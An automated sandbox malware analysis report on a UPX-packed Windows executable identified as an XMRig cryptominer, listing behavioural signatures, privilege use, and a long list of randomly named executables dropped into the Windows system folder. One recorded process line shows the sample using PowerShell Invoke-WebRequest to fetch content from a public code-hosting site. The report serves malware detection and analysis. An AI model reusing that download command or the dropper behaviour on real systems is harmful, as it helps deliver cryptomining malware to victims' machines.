Malware Analysis Report

2024-09-10 08:04

Sample ID 240613-p6n6mstenm
Target 7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe
SHA256 e062efc7fc716c231e974cd3d8730e37f3f9fdc4263d05dc8f4a274521ba1463
Tags
miner upx xmrig execution
score
10/10

Analysis Overview

score
10/10

SHA256

e062efc7fc716c231e974cd3d8730e37f3f9fdc4263d05dc8f4a274521ba1463

Threat Level: Known bad

The file 7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 12:56

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 12:56

Reported

2024-06-13 12:59

Platform

win7-20240611-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Windows\System32\sj0mxx.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Processes

C:\Windows\System32\sj0mxx.exe

"C:\Windows\System32\sj0mxx.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\yijTqaO.exe

C:\Windows\System\yijTqaO.exe

C:\Windows\System\QDXuOZR.exe

C:\Windows\System\QDXuOZR.exe

C:\Windows\System\alQTUEP.exe

C:\Windows\System\alQTUEP.exe

C:\Windows\System\MudWfMP.exe

C:\Windows\System\MudWfMP.exe

C:\Windows\System\FbglMtQ.exe

C:\Windows\System\FbglMtQ.exe

C:\Windows\System\OVcUEPf.exe

C:\Windows\System\OVcUEPf.exe

C:\Windows\System\GcFUNtV.exe

C:\Windows\System\GcFUNtV.exe

C:\Windows\System\Ijwfqcn.exe

C:\Windows\System\Ijwfqcn.exe

C:\Windows\System\pmMFRuZ.exe

C:\Windows\System\pmMFRuZ.exe

C:\Windows\System\jtjpxTG.exe

C:\Windows\System\jtjpxTG.exe

C:\Windows\System\dTyrgfz.exe

C:\Windows\System\dTyrgfz.exe

C:\Windows\System\DgcErzd.exe

C:\Windows\System\DgcErzd.exe

C:\Windows\System\IxrJBVS.exe

C:\Windows\System\IxrJBVS.exe

C:\Windows\System\zbtXarn.exe

C:\Windows\System\zbtXarn.exe

C:\Windows\System\oIGziTL.exe

C:\Windows\System\oIGziTL.exe

C:\Windows\System\hQWcyCw.exe

C:\Windows\System\hQWcyCw.exe

C:\Windows\System\gcvILjV.exe

C:\Windows\System\gcvILjV.exe

C:\Windows\System\PAAqXMi.exe

C:\Windows\System\PAAqXMi.exe

C:\Windows\System\TIbDOhI.exe

C:\Windows\System\TIbDOhI.exe

C:\Windows\System\rQXQnqs.exe

C:\Windows\System\rQXQnqs.exe

C:\Windows\System\SlyTnJB.exe

C:\Windows\System\SlyTnJB.exe

C:\Windows\System\oeruLOo.exe

C:\Windows\System\oeruLOo.exe

C:\Windows\System\SIjGYiA.exe

C:\Windows\System\SIjGYiA.exe

C:\Windows\System\KZmSrcb.exe

C:\Windows\System\KZmSrcb.exe

C:\Windows\System\UmkldVp.exe

C:\Windows\System\UmkldVp.exe

C:\Windows\System\KXJfXQH.exe

C:\Windows\System\KXJfXQH.exe

C:\Windows\System\ZQSwARW.exe

C:\Windows\System\ZQSwARW.exe

C:\Windows\System\ahXGlbX.exe

C:\Windows\System\ahXGlbX.exe

C:\Windows\System\WHZUwZI.exe

C:\Windows\System\WHZUwZI.exe

C:\Windows\System\tAMNDso.exe

C:\Windows\System\tAMNDso.exe

C:\Windows\System\IYLgSTB.exe

C:\Windows\System\IYLgSTB.exe

C:\Windows\System\LUjndmL.exe

C:\Windows\System\LUjndmL.exe

C:\Windows\System\GFBkuLp.exe

C:\Windows\System\GFBkuLp.exe

C:\Windows\System\hDykDPP.exe

C:\Windows\System\hDykDPP.exe

C:\Windows\System\VbALrzu.exe

C:\Windows\System\VbALrzu.exe

C:\Windows\System\tDDxVWm.exe

C:\Windows\System\tDDxVWm.exe

C:\Windows\System\ZajZISF.exe

C:\Windows\System\ZajZISF.exe

C:\Windows\System\GugjQMv.exe

C:\Windows\System\GugjQMv.exe

C:\Windows\System\ZiLxxYe.exe

C:\Windows\System\ZiLxxYe.exe

C:\Windows\System\iAQjDfZ.exe

C:\Windows\System\iAQjDfZ.exe

C:\Windows\System\GUtwGcg.exe

C:\Windows\System\GUtwGcg.exe

C:\Windows\System\QBLuAvH.exe

C:\Windows\System\QBLuAvH.exe

C:\Windows\System\hXAogpZ.exe

C:\Windows\System\hXAogpZ.exe

C:\Windows\System\fPMpNas.exe

C:\Windows\System\fPMpNas.exe

C:\Windows\System\cAMdnAN.exe

C:\Windows\System\cAMdnAN.exe

C:\Windows\System\NPRYwDz.exe

C:\Windows\System\NPRYwDz.exe

C:\Windows\System\WBYZzcO.exe

C:\Windows\System\WBYZzcO.exe

C:\Windows\System\LHsSMMt.exe

C:\Windows\System\LHsSMMt.exe

C:\Windows\System\lUAisEA.exe

C:\Windows\System\lUAisEA.exe

C:\Windows\System\RSIJxKV.exe

C:\Windows\System\RSIJxKV.exe

C:\Windows\System\XwBOVwu.exe

C:\Windows\System\XwBOVwu.exe

C:\Windows\System\pvCDKQR.exe

C:\Windows\System\pvCDKQR.exe

C:\Windows\System\wmTESGO.exe

C:\Windows\System\wmTESGO.exe

C:\Windows\System\qMGXwjV.exe

C:\Windows\System\qMGXwjV.exe

C:\Windows\System\rPLTmMH.exe

C:\Windows\System\rPLTmMH.exe

C:\Windows\System\NCZaZhB.exe

C:\Windows\System\NCZaZhB.exe

C:\Windows\System\wVewwxh.exe

C:\Windows\System\wVewwxh.exe

C:\Windows\System\ykbXgln.exe

C:\Windows\System\ykbXgln.exe

C:\Windows\System\GNLXzOf.exe

C:\Windows\System\GNLXzOf.exe

C:\Windows\System\MstTakO.exe

C:\Windows\System\MstTakO.exe

C:\Windows\System\odIWNZu.exe

C:\Windows\System\odIWNZu.exe

C:\Windows\System\oPqmVqV.exe

C:\Windows\System\oPqmVqV.exe

C:\Windows\System\aDWSmjt.exe

C:\Windows\System\aDWSmjt.exe

C:\Windows\System\CjDxqOP.exe

C:\Windows\System\CjDxqOP.exe

C:\Windows\System\ahfWpyy.exe

C:\Windows\System\ahfWpyy.exe

C:\Windows\System\gKKDqEU.exe

C:\Windows\System\gKKDqEU.exe

C:\Windows\System\qyVyDfz.exe

C:\Windows\System\qyVyDfz.exe

C:\Windows\System\ztcbeFP.exe

C:\Windows\System\ztcbeFP.exe

C:\Windows\System\qgpCxCq.exe

C:\Windows\System\qgpCxCq.exe

C:\Windows\System\qAupSDU.exe

C:\Windows\System\qAupSDU.exe

C:\Windows\System\ycuXCCN.exe

C:\Windows\System\ycuXCCN.exe

C:\Windows\System\odyszCo.exe

C:\Windows\System\odyszCo.exe

C:\Windows\System\EKpPqWc.exe

C:\Windows\System\EKpPqWc.exe

C:\Windows\System\yXyWvPm.exe

C:\Windows\System\yXyWvPm.exe

C:\Windows\System\URYqFFm.exe

C:\Windows\System\URYqFFm.exe

C:\Windows\System\RoohQsn.exe

C:\Windows\System\RoohQsn.exe

C:\Windows\System\UQgIFRa.exe

C:\Windows\System\UQgIFRa.exe

C:\Windows\System\RrEXiZP.exe

C:\Windows\System\RrEXiZP.exe

C:\Windows\System\KGohFeV.exe

C:\Windows\System\KGohFeV.exe

C:\Windows\System\LqaYFvY.exe

C:\Windows\System\LqaYFvY.exe

C:\Windows\System\dayzGvS.exe

C:\Windows\System\dayzGvS.exe

C:\Windows\System\cCbbnqr.exe

C:\Windows\System\cCbbnqr.exe

C:\Windows\System\Hzlmerx.exe

C:\Windows\System\Hzlmerx.exe

C:\Windows\System\vJqomaC.exe

C:\Windows\System\vJqomaC.exe

C:\Windows\System\HsavzgB.exe

C:\Windows\System\HsavzgB.exe

C:\Windows\System\SGhlGDw.exe

C:\Windows\System\SGhlGDw.exe

C:\Windows\System\QvFOiws.exe

C:\Windows\System\QvFOiws.exe

C:\Windows\System\vHwwcDa.exe

C:\Windows\System\vHwwcDa.exe

C:\Windows\System\eQjGYvY.exe

C:\Windows\System\eQjGYvY.exe

C:\Windows\System\VaLiouo.exe

C:\Windows\System\VaLiouo.exe

C:\Windows\System\QqjAvbG.exe

C:\Windows\System\QqjAvbG.exe

C:\Windows\System\OkgRgfx.exe

C:\Windows\System\OkgRgfx.exe

C:\Windows\System\NXoJqWN.exe

C:\Windows\System\NXoJqWN.exe

C:\Windows\System\wwqnbEG.exe

C:\Windows\System\wwqnbEG.exe

C:\Windows\System\KPTArCf.exe

C:\Windows\System\KPTArCf.exe

C:\Windows\System\onAqBBG.exe

C:\Windows\System\onAqBBG.exe

C:\Windows\System\wRIGtdd.exe

C:\Windows\System\wRIGtdd.exe

C:\Windows\System\KhPTxmV.exe

C:\Windows\System\KhPTxmV.exe

C:\Windows\System\yTiDLtg.exe

C:\Windows\System\yTiDLtg.exe

C:\Windows\System\dFUvLXZ.exe

C:\Windows\System\dFUvLXZ.exe

C:\Windows\System\JpvmaRx.exe

C:\Windows\System\JpvmaRx.exe

C:\Windows\System\sVRulsJ.exe

C:\Windows\System\sVRulsJ.exe

C:\Windows\System\kQRgCgT.exe

C:\Windows\System\kQRgCgT.exe

C:\Windows\System\XgIpKNQ.exe

C:\Windows\System\XgIpKNQ.exe

C:\Windows\System\NiILZfJ.exe

C:\Windows\System\NiILZfJ.exe

C:\Windows\System\SwKGeJQ.exe

C:\Windows\System\SwKGeJQ.exe

C:\Windows\System\ieemgUM.exe

C:\Windows\System\ieemgUM.exe

C:\Windows\System\QgUmwwf.exe

C:\Windows\System\QgUmwwf.exe

C:\Windows\System\hxoOuYw.exe

C:\Windows\System\hxoOuYw.exe

C:\Windows\System\TBRhhJJ.exe

C:\Windows\System\TBRhhJJ.exe

C:\Windows\System\uTkBsLv.exe

C:\Windows\System\uTkBsLv.exe

C:\Windows\System\QdApKXF.exe

C:\Windows\System\QdApKXF.exe

C:\Windows\System\EaxgtNl.exe

C:\Windows\System\EaxgtNl.exe

C:\Windows\System\ADdUwxu.exe

C:\Windows\System\ADdUwxu.exe

C:\Windows\System\vyVWbFg.exe

C:\Windows\System\vyVWbFg.exe

C:\Windows\System\frLNvVb.exe

C:\Windows\System\frLNvVb.exe

C:\Windows\System\xLKoOHr.exe

C:\Windows\System\xLKoOHr.exe

C:\Windows\System\rBXgvJK.exe

C:\Windows\System\rBXgvJK.exe

C:\Windows\System\BMhrcAg.exe

C:\Windows\System\BMhrcAg.exe

C:\Windows\System\rigFTTz.exe

C:\Windows\System\rigFTTz.exe

C:\Windows\System\yZhjAWa.exe

C:\Windows\System\yZhjAWa.exe

C:\Windows\System\JdaTeta.exe

C:\Windows\System\JdaTeta.exe

C:\Windows\System\QqPFKFf.exe

C:\Windows\System\QqPFKFf.exe

C:\Windows\System\kxJxZnF.exe

C:\Windows\System\kxJxZnF.exe

C:\Windows\System\RctBlDS.exe

C:\Windows\System\RctBlDS.exe

C:\Windows\System\sdhAqJV.exe

C:\Windows\System\sdhAqJV.exe

C:\Windows\System\XZzMiXK.exe

C:\Windows\System\XZzMiXK.exe

C:\Windows\System\JibCxyC.exe

C:\Windows\System\JibCxyC.exe

C:\Windows\System\rIljIJe.exe

C:\Windows\System\rIljIJe.exe

C:\Windows\System\PAhgSUB.exe

C:\Windows\System\PAhgSUB.exe

C:\Windows\System\ssMHsQQ.exe

C:\Windows\System\ssMHsQQ.exe

C:\Windows\System\YGzHezd.exe

C:\Windows\System\YGzHezd.exe

C:\Windows\System\lsNbjzq.exe

C:\Windows\System\lsNbjzq.exe

C:\Windows\System\aweHnRV.exe

C:\Windows\System\aweHnRV.exe

C:\Windows\System\QCPFLUr.exe

C:\Windows\System\QCPFLUr.exe

C:\Windows\System\NDLuwbO.exe

C:\Windows\System\NDLuwbO.exe

C:\Windows\System\TGZbifa.exe

C:\Windows\System\TGZbifa.exe

C:\Windows\System\kXWmKrl.exe

C:\Windows\System\kXWmKrl.exe

C:\Windows\System\kwFiwml.exe

C:\Windows\System\kwFiwml.exe

C:\Windows\System\yzkLjpr.exe

C:\Windows\System\yzkLjpr.exe

C:\Windows\System\zpeGhKI.exe

C:\Windows\System\zpeGhKI.exe

C:\Windows\System\UQWJxaT.exe

C:\Windows\System\UQWJxaT.exe

C:\Windows\System\sTxOdhd.exe

C:\Windows\System\sTxOdhd.exe

C:\Windows\System\PZxeTPh.exe

C:\Windows\System\PZxeTPh.exe

C:\Windows\System\ahGAjtA.exe

C:\Windows\System\ahGAjtA.exe

C:\Windows\System\lKicQdq.exe

C:\Windows\System\lKicQdq.exe

C:\Windows\System\PXmGWPx.exe

C:\Windows\System\PXmGWPx.exe

C:\Windows\System\qhpUOXj.exe

C:\Windows\System\qhpUOXj.exe

C:\Windows\System\vSxrkwK.exe

C:\Windows\System\vSxrkwK.exe

C:\Windows\System\FbRBznN.exe

C:\Windows\System\FbRBznN.exe

C:\Windows\System\GpHlIqt.exe

C:\Windows\System\GpHlIqt.exe

C:\Windows\System\xlFksEm.exe

C:\Windows\System\xlFksEm.exe

C:\Windows\System\wDcemrP.exe

C:\Windows\System\wDcemrP.exe

C:\Windows\System\IkyNmxE.exe

C:\Windows\System\IkyNmxE.exe

C:\Windows\System\Znecdba.exe

C:\Windows\System\Znecdba.exe

C:\Windows\System\iytUcRV.exe

C:\Windows\System\iytUcRV.exe

C:\Windows\System\kUbiFsD.exe

C:\Windows\System\kUbiFsD.exe

C:\Windows\System\UtPqlFV.exe

C:\Windows\System\UtPqlFV.exe

C:\Windows\System\MYDPxOL.exe

C:\Windows\System\MYDPxOL.exe

C:\Windows\System\KbjeXaO.exe

C:\Windows\System\KbjeXaO.exe

C:\Windows\System\ggRdDZp.exe

C:\Windows\System\ggRdDZp.exe

C:\Windows\System\qeUaEeF.exe

C:\Windows\System\qeUaEeF.exe

C:\Windows\System\QrGliNa.exe

C:\Windows\System\QrGliNa.exe

C:\Windows\System\gZNZVVr.exe

C:\Windows\System\gZNZVVr.exe

C:\Windows\System\guQzYQS.exe

C:\Windows\System\guQzYQS.exe

C:\Windows\System\XZIvaUe.exe

C:\Windows\System\XZIvaUe.exe

C:\Windows\System\GHCaAQi.exe

C:\Windows\System\GHCaAQi.exe

C:\Windows\System\EReAEJI.exe

C:\Windows\System\EReAEJI.exe

C:\Windows\System\dlkIyMN.exe

C:\Windows\System\dlkIyMN.exe

C:\Windows\System\fpxeyEI.exe

C:\Windows\System\fpxeyEI.exe

C:\Windows\System\tRCJmmX.exe

C:\Windows\System\tRCJmmX.exe

C:\Windows\System\pYAQbQx.exe

C:\Windows\System\pYAQbQx.exe

C:\Windows\System\SuHyFZC.exe

C:\Windows\System\SuHyFZC.exe

C:\Windows\System\TsPHFdE.exe

C:\Windows\System\TsPHFdE.exe

C:\Windows\System\hrANvSK.exe

C:\Windows\System\hrANvSK.exe

C:\Windows\System\qpBtvwy.exe

C:\Windows\System\qpBtvwy.exe

C:\Windows\System\LVhcqdG.exe

C:\Windows\System\LVhcqdG.exe

C:\Windows\System\auCnTks.exe

C:\Windows\System\auCnTks.exe

C:\Windows\System\UsezMoL.exe

C:\Windows\System\UsezMoL.exe

C:\Windows\System\sjAreSv.exe

C:\Windows\System\sjAreSv.exe

C:\Windows\System\peqfQlq.exe

C:\Windows\System\peqfQlq.exe

C:\Windows\System\sSTAcqe.exe

C:\Windows\System\sSTAcqe.exe

C:\Windows\System\ivYmHNP.exe

C:\Windows\System\ivYmHNP.exe

C:\Windows\System\uqaJlHo.exe

C:\Windows\System\uqaJlHo.exe

C:\Windows\System\hiYzUSj.exe

C:\Windows\System\hiYzUSj.exe

C:\Windows\System\rcMWdWH.exe

C:\Windows\System\rcMWdWH.exe

C:\Windows\System\HwpJsyb.exe

C:\Windows\System\HwpJsyb.exe

C:\Windows\System\sELQqHV.exe

C:\Windows\System\sELQqHV.exe

C:\Windows\System\KlynyBU.exe

C:\Windows\System\KlynyBU.exe

C:\Windows\System\NcbYfuV.exe

C:\Windows\System\NcbYfuV.exe

C:\Windows\System\Guhhzjd.exe

C:\Windows\System\Guhhzjd.exe

C:\Windows\System\KHBWfBa.exe

C:\Windows\System\KHBWfBa.exe

C:\Windows\System\tJNtJmG.exe

C:\Windows\System\tJNtJmG.exe

C:\Windows\System\oMskkUM.exe

C:\Windows\System\oMskkUM.exe

C:\Windows\System\LvdNhUI.exe

C:\Windows\System\LvdNhUI.exe

C:\Windows\System\seCuzmy.exe

C:\Windows\System\seCuzmy.exe

C:\Windows\System\gzuDlFQ.exe

C:\Windows\System\gzuDlFQ.exe

C:\Windows\System\EJYHfhD.exe

C:\Windows\System\EJYHfhD.exe

C:\Windows\System\GHdLifY.exe

C:\Windows\System\GHdLifY.exe

C:\Windows\System\MJrGfSo.exe

C:\Windows\System\MJrGfSo.exe

C:\Windows\System\QnaFOgV.exe

C:\Windows\System\QnaFOgV.exe

C:\Windows\System\ZaRyiUd.exe

C:\Windows\System\ZaRyiUd.exe

C:\Windows\System\BjcwTZh.exe

C:\Windows\System\BjcwTZh.exe

C:\Windows\System\WkYEPGt.exe

C:\Windows\System\WkYEPGt.exe

C:\Windows\System\Ksnlrbc.exe

C:\Windows\System\Ksnlrbc.exe

C:\Windows\System\whRgnyf.exe

C:\Windows\System\whRgnyf.exe

C:\Windows\System\pbjsqEa.exe

C:\Windows\System\pbjsqEa.exe

C:\Windows\System\XpJSYxF.exe

C:\Windows\System\XpJSYxF.exe

C:\Windows\System\Aodvnjp.exe

C:\Windows\System\Aodvnjp.exe

C:\Windows\System\ghJoGkU.exe

C:\Windows\System\ghJoGkU.exe

C:\Windows\System\xgZYZqZ.exe

C:\Windows\System\xgZYZqZ.exe

C:\Windows\System\UAJrrxu.exe

C:\Windows\System\UAJrrxu.exe

C:\Windows\System\yulqqgy.exe

C:\Windows\System\yulqqgy.exe

C:\Windows\System\xpUHRpF.exe

C:\Windows\System\xpUHRpF.exe

C:\Windows\System\nyqsYhx.exe

C:\Windows\System\nyqsYhx.exe

C:\Windows\System\lYwxTEq.exe

C:\Windows\System\lYwxTEq.exe

C:\Windows\System\EGHrHvO.exe

C:\Windows\System\EGHrHvO.exe

C:\Windows\System\BoUkOka.exe

C:\Windows\System\BoUkOka.exe

C:\Windows\System\aSsrOaq.exe

C:\Windows\System\aSsrOaq.exe

C:\Windows\System\FXqGOuj.exe

C:\Windows\System\FXqGOuj.exe

C:\Windows\System\OZLWpPw.exe

C:\Windows\System\OZLWpPw.exe

C:\Windows\System\xzKizuj.exe

C:\Windows\System\xzKizuj.exe

C:\Windows\System\xNmiYPF.exe

C:\Windows\System\xNmiYPF.exe

C:\Windows\System\ZIskRaV.exe

C:\Windows\System\ZIskRaV.exe

C:\Windows\System\wJkGMgh.exe

C:\Windows\System\wJkGMgh.exe

C:\Windows\System\xOBUtCT.exe

C:\Windows\System\xOBUtCT.exe

C:\Windows\System\XIVwRNJ.exe

C:\Windows\System\XIVwRNJ.exe

C:\Windows\System\aByapga.exe

C:\Windows\System\aByapga.exe

C:\Windows\System\OCIXbVB.exe

C:\Windows\System\OCIXbVB.exe

C:\Windows\System\cuNmauY.exe

C:\Windows\System\cuNmauY.exe

C:\Windows\System\wZUcjdA.exe

C:\Windows\System\wZUcjdA.exe

C:\Windows\System\zqKFdzg.exe

C:\Windows\System\zqKFdzg.exe

C:\Windows\System\WovfbUO.exe

C:\Windows\System\WovfbUO.exe

C:\Windows\System\QZEFbXl.exe

C:\Windows\System\QZEFbXl.exe

C:\Windows\System\MIvqwSu.exe

C:\Windows\System\MIvqwSu.exe

C:\Windows\System\sLspoAw.exe

C:\Windows\System\sLspoAw.exe

C:\Windows\System\mZGKxDV.exe

C:\Windows\System\mZGKxDV.exe

C:\Windows\System\LQwTJEe.exe

C:\Windows\System\LQwTJEe.exe

C:\Windows\System\wCMgqOX.exe

C:\Windows\System\wCMgqOX.exe

C:\Windows\System\uBRAsfe.exe

C:\Windows\System\uBRAsfe.exe

C:\Windows\System\UteFGLP.exe

C:\Windows\System\UteFGLP.exe

C:\Windows\System\ThXtwfV.exe

C:\Windows\System\ThXtwfV.exe

C:\Windows\System\TLymAqp.exe

C:\Windows\System\TLymAqp.exe

C:\Windows\System\ANmUuMd.exe

C:\Windows\System\ANmUuMd.exe

C:\Windows\System\AzaPKEP.exe

C:\Windows\System\AzaPKEP.exe

C:\Windows\System\HAQBBKD.exe

C:\Windows\System\HAQBBKD.exe

C:\Windows\System\zlWUbKs.exe

C:\Windows\System\zlWUbKs.exe

C:\Windows\System\WoGfiKO.exe

C:\Windows\System\WoGfiKO.exe

C:\Windows\System\RLIdTpM.exe

C:\Windows\System\RLIdTpM.exe

C:\Windows\System\YimkhHG.exe

C:\Windows\System\YimkhHG.exe

C:\Windows\System\zTqKMmj.exe

C:\Windows\System\zTqKMmj.exe

C:\Windows\System\KLQycfo.exe

C:\Windows\System\KLQycfo.exe

C:\Windows\System\SoYZVcE.exe

C:\Windows\System\SoYZVcE.exe

C:\Windows\System\bwnlSKa.exe

C:\Windows\System\bwnlSKa.exe

C:\Windows\System\MhLuNtr.exe

C:\Windows\System\MhLuNtr.exe

C:\Windows\System\nQVaJmV.exe

C:\Windows\System\nQVaJmV.exe

C:\Windows\System\EVfdiGL.exe

C:\Windows\System\EVfdiGL.exe

C:\Windows\System\NPzZHdZ.exe

C:\Windows\System\NPzZHdZ.exe

C:\Windows\System\eaRCJrt.exe

C:\Windows\System\eaRCJrt.exe

C:\Windows\System\EdmthVQ.exe

C:\Windows\System\EdmthVQ.exe

C:\Windows\System\CcXEdkl.exe

C:\Windows\System\CcXEdkl.exe

C:\Windows\System\XGUMzhk.exe

C:\Windows\System\XGUMzhk.exe

C:\Windows\System\XDGZROm.exe

C:\Windows\System\XDGZROm.exe

C:\Windows\System\jZUseEN.exe

C:\Windows\System\jZUseEN.exe

C:\Windows\System\JoeoMPd.exe

C:\Windows\System\JoeoMPd.exe

C:\Windows\System\hboJTqY.exe

C:\Windows\System\hboJTqY.exe

C:\Windows\System\rbBQsmg.exe

C:\Windows\System\rbBQsmg.exe

C:\Windows\System\hgAVshG.exe

C:\Windows\System\hgAVshG.exe

C:\Windows\System\jXxSGxz.exe

C:\Windows\System\jXxSGxz.exe

C:\Windows\System\hLPNkYw.exe

C:\Windows\System\hLPNkYw.exe

C:\Windows\System\FRZoYgm.exe

C:\Windows\System\FRZoYgm.exe

C:\Windows\System\dBsfYiW.exe

C:\Windows\System\dBsfYiW.exe

C:\Windows\System\cgmjXKy.exe

C:\Windows\System\cgmjXKy.exe

C:\Windows\System\jmAENYX.exe

C:\Windows\System\jmAENYX.exe

C:\Windows\System\wxmoSXe.exe

C:\Windows\System\wxmoSXe.exe

C:\Windows\System\qhEqKrD.exe

C:\Windows\System\qhEqKrD.exe

C:\Windows\System\phVVdtw.exe

C:\Windows\System\phVVdtw.exe

C:\Windows\System\WzEPRim.exe

C:\Windows\System\WzEPRim.exe

C:\Windows\System\CdBLBgX.exe

C:\Windows\System\CdBLBgX.exe

C:\Windows\System\GolExTi.exe

C:\Windows\System\GolExTi.exe

C:\Windows\System\BShybwt.exe

C:\Windows\System\BShybwt.exe

C:\Windows\System\ujGyOsu.exe

C:\Windows\System\ujGyOsu.exe

C:\Windows\System\EdTLeHH.exe

C:\Windows\System\EdTLeHH.exe

C:\Windows\System\brfnIZz.exe

C:\Windows\System\brfnIZz.exe

C:\Windows\System\PEaGymL.exe

C:\Windows\System\PEaGymL.exe

C:\Windows\System\spLsclJ.exe

C:\Windows\System\spLsclJ.exe

C:\Windows\System\cAGNIMm.exe

C:\Windows\System\cAGNIMm.exe

C:\Windows\System\lynkqJF.exe

C:\Windows\System\lynkqJF.exe

C:\Windows\System\miJpwNm.exe

C:\Windows\System\miJpwNm.exe

C:\Windows\System\gwWWqzH.exe

C:\Windows\System\gwWWqzH.exe

C:\Windows\System\YNBpWfw.exe

C:\Windows\System\YNBpWfw.exe

C:\Windows\System\zvojxPs.exe

C:\Windows\System\zvojxPs.exe

C:\Windows\System\PVtTQyD.exe

C:\Windows\System\PVtTQyD.exe

C:\Windows\System\JoYytqN.exe

C:\Windows\System\JoYytqN.exe

C:\Windows\System\oihlEzj.exe

C:\Windows\System\oihlEzj.exe

C:\Windows\System\LLgnJAo.exe

C:\Windows\System\LLgnJAo.exe

C:\Windows\System\wMXznqg.exe

C:\Windows\System\wMXznqg.exe

C:\Windows\System\kAAdYPl.exe

C:\Windows\System\kAAdYPl.exe

C:\Windows\System\dQfoeha.exe

C:\Windows\System\dQfoeha.exe

C:\Windows\System\LkoBRhC.exe

C:\Windows\System\LkoBRhC.exe

C:\Windows\System\xSCaGNX.exe

C:\Windows\System\xSCaGNX.exe

C:\Windows\System\JImBDqY.exe

C:\Windows\System\JImBDqY.exe

C:\Windows\System\SMHOPLm.exe

C:\Windows\System\SMHOPLm.exe

C:\Windows\System\ChvPkOb.exe

C:\Windows\System\ChvPkOb.exe

C:\Windows\System\npaMSAh.exe

C:\Windows\System\npaMSAh.exe

C:\Windows\System\PZcfugv.exe

C:\Windows\System\PZcfugv.exe

C:\Windows\System\CKUmXfc.exe

C:\Windows\System\CKUmXfc.exe

C:\Windows\System\LSTlruR.exe

C:\Windows\System\LSTlruR.exe

C:\Windows\System\yMiSaDe.exe

C:\Windows\System\yMiSaDe.exe

C:\Windows\System\ajgDoIX.exe

C:\Windows\System\ajgDoIX.exe

C:\Windows\System\eCprRoD.exe

C:\Windows\System\eCprRoD.exe

C:\Windows\System\ztwPtEQ.exe

C:\Windows\System\ztwPtEQ.exe

C:\Windows\System\zluZoSR.exe

C:\Windows\System\zluZoSR.exe

C:\Windows\System\ICVaWJL.exe

C:\Windows\System\ICVaWJL.exe

C:\Windows\System\YeolAxw.exe

C:\Windows\System\YeolAxw.exe

C:\Windows\System\ozVXKsx.exe

C:\Windows\System\ozVXKsx.exe

C:\Windows\System\MjufcDW.exe

C:\Windows\System\MjufcDW.exe

C:\Windows\System\yxqcwIu.exe

C:\Windows\System\yxqcwIu.exe

C:\Windows\System\JPhLQKC.exe

C:\Windows\System\JPhLQKC.exe

C:\Windows\System\iWrZFGp.exe

C:\Windows\System\iWrZFGp.exe

C:\Windows\System\JjfKSpX.exe

C:\Windows\System\JjfKSpX.exe

C:\Windows\System\tAqsHyQ.exe

C:\Windows\System\tAqsHyQ.exe

C:\Windows\System\fpynAkK.exe

C:\Windows\System\fpynAkK.exe

C:\Windows\System\vqFUVUV.exe

C:\Windows\System\vqFUVUV.exe

C:\Windows\System\yIUXWjo.exe

C:\Windows\System\yIUXWjo.exe

C:\Windows\System\fcSDdvO.exe

C:\Windows\System\fcSDdvO.exe

C:\Windows\System\DRoKyCr.exe

C:\Windows\System\DRoKyCr.exe

C:\Windows\System\Pprrvof.exe

C:\Windows\System\Pprrvof.exe

C:\Windows\System\UXctmZs.exe

C:\Windows\System\UXctmZs.exe

C:\Windows\System\QvgUmco.exe

C:\Windows\System\QvgUmco.exe

C:\Windows\System\SgoNJHU.exe

C:\Windows\System\SgoNJHU.exe

C:\Windows\System\jKUtSQc.exe

C:\Windows\System\jKUtSQc.exe

C:\Windows\System\PsqUOcw.exe

C:\Windows\System\PsqUOcw.exe

C:\Windows\System\zKuHQlg.exe

C:\Windows\System\zKuHQlg.exe

C:\Windows\System\lSDxXVp.exe

C:\Windows\System\lSDxXVp.exe

C:\Windows\System\siJpjCn.exe

C:\Windows\System\siJpjCn.exe

C:\Windows\System\UskluNw.exe

C:\Windows\System\UskluNw.exe

C:\Windows\System\lWXQNBZ.exe

C:\Windows\System\lWXQNBZ.exe

C:\Windows\System\tPxBzvD.exe

C:\Windows\System\tPxBzvD.exe

C:\Windows\System\itwJdOG.exe

C:\Windows\System\itwJdOG.exe

C:\Windows\System\XHRAaKV.exe

C:\Windows\System\XHRAaKV.exe

